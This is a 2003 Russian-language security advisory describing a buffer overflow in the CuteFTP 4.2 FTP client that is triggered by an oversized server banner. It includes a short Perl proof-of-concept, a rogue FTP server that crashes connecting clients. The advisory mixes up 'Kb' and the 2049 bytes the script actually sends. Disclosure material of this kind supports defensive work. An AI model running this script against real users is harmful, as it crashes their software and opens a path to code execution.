Переполнение буфера в CuteFTP

Дата публикации:
05.01.2003
Всего просмотров:
708
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: CuteFTP – популярный FTP клиент для Windows систем.

В программе обнаружена возможность удаленного переполнения буфера, которая может использоваться злонамеренным FTP сервером для выполнения произвольного кода на системе клиента. Переполнение происходит при получении FTP баннера большого размера (более 2048 Кб). Пример FTP сервера, который убивает клиентский CuteFTP:

#!/usr/bin/perl
use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, 
Reuse => 1, Listen => 2) or die "Couldn't create ftp-server: $_\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF
Уязвимость найдена в CuteFTP v.4.2 и возможно в более новых версиях

Уязвимость обнаружена D4rkGr3y из Damage Hacking Group

Ссылки: CuteFTP v.4.2: buffer overflow ::

или введите имя

CAPTCHA